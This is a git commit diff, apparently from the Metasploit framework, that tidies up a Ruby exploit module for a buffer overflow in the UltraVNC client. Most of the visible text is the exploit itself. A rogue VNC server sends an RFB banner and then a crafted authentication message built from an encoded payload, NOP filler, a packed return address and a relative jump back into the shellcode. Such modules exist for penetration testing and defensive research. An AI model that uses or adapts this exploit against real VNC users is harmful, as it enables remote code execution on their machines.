module clean up for ultravnc_client.rb
git-svn-id: file:///home/svn/framework3/trunk@4204 4d416f70-5f16-0410-b530-b9f4589650daunstable
parent
cfdd264f2d
commit
529b808fc9
|
@ -48,20 +48,21 @@ class Exploits::Windows::Vnc::Ultravnc_Client < Exploit::Remote
|
||||||
end
|
end
|
||||||
|
|
||||||
def on_client_connect(client)
|
def on_client_connect(client)
|
||||||
|
|
||||||
|
rfb = "RFB 003.006\n"
|
||||||
|
|
||||||
|
client.put(rfb)
|
||||||
|
end
|
||||||
|
|
||||||
|
def on_client_data(client)
|
||||||
return if ((p = regenerate_payload(client)) == nil)
|
return if ((p = regenerate_payload(client)) == nil)
|
||||||
|
|
||||||
filler = make_nops(980 - payload.encoded.length)
|
filler = make_nops(980 - payload.encoded.length)
|
||||||
|
|
||||||
rfb = "RFB 003.006\n"
|
|
||||||
|
|
||||||
sploit = "\x00\x00\x00\x00\x00\x00\x04\x06" + "Requires Ultr@VNC Authentication\n"
|
sploit = "\x00\x00\x00\x00\x00\x00\x04\x06" + "Requires Ultr@VNC Authentication\n"
|
||||||
sploit << payload.encoded + filler + [target.ret].pack('V')
|
sploit << payload.encoded + filler + [target.ret].pack('V')
|
||||||
sploit << "PASSWORD" + [0xe8, -997].pack('CV')
|
sploit << "PASSWORD" + [0xe8, -997].pack('CV')
|
||||||
|
|
||||||
client.put(rfb)
|
|
||||||
|
|
||||||
on_client_data(16)
|
|
||||||
|
|
||||||
print_status("Sending #{sploit.length} bytes to #{client.getpeername}:#{client.peerport}...")
|
print_status("Sending #{sploit.length} bytes to #{client.getpeername}:#{client.peerport}...")
|
||||||
client.put(sploit)
|
client.put(sploit)
|
||||||
|
|
||||||
|
|
Loading…
Reference in New Issue